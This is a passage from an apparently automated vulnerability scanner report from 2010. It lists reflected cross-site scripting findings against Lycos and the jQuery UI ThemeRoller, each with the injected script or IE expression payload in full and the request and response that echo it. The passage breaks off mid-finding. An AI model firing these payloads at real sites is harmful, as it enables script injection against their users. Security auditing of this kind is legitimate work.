Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images9c59d"><script>alert(1)</script>b1e138b458a&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.53. http://info.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4a7"><script>alert(1)</script>abc7cf3bcbf was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&cat=images HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327d3"><script>alert(1)</script>739d92ba30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos.php/327d3"><script>alert(1)</script>739d92ba30c HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163891850882

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 91442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<a href="/tos.php/327d3"><script>alert(1)</script>739d92ba30c#acceptance">
...[SNIP]...

1.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ade7"style="x:expression(alert(1))"6cec803882f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f=1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161724686; path=/
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=num82irdh4ljeo4nnvsi6bqqo5; expires=Sun, 12 Dec 2010 15:34:34 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
Set-Cookie: diktfc=20F93AF4482D6F2C33F3F1B215794291BCD892461E6A; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;2ade7"style="x:expression(alert(1))"6cec803882f=1&amp;q=">
...[SNIP]...

1.56. http://jobs.lycos.com/search [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.lycos.com
Path:   /search

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 was submitted in the x parameter. This input was echoed as b25f3"style="x:expression(alert(1))"8e6083360e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?x=1b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161729042; path=/
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=4dq7os30hes5qg14m1sf1m0oc1; expires=Sun, 12 Dec 2010 15:34:36 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
Set-Cookie: diktfc=FA178DC2496B1980044763822ACABD48B570396C18E7; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&amp;x=1b25f3"style="x:expression(alert(1))"8e6083360e1&amp;q=">
...[SNIP]...

1.57. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10fbb"><script>alert(1)</script>21f65dae1a0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10fbb"><script>alert(1)</script>21f65dae1a0&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

1.58. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7317f"><script>alert(1)</script>b5f47834e30 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff7317f"><script>alert(1)</script>b5f47834e30&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

1.59. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69061"><script>alert(1)</script>1a694a592e7 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e669061"><script>alert(1)</script>1a694a592e7&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

1.60. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c43"><script>alert(1)</script>a36a3b5f95c was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ece1c43"><script>alert(1)</script>a36a3b5f95c&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

1.61. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fef"><script>alert(1)</script>4b472d7ef35 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc87fef"><script>alert(1)</script>4b472d7ef35&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

1.62. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac242"><script>alert(1)</script>71aa1498cfe was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9eeac242"><script>alert(1)</script>71aa1498cfe&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

1.63. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e26"><script>alert(1)</script>1a3124de35d was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

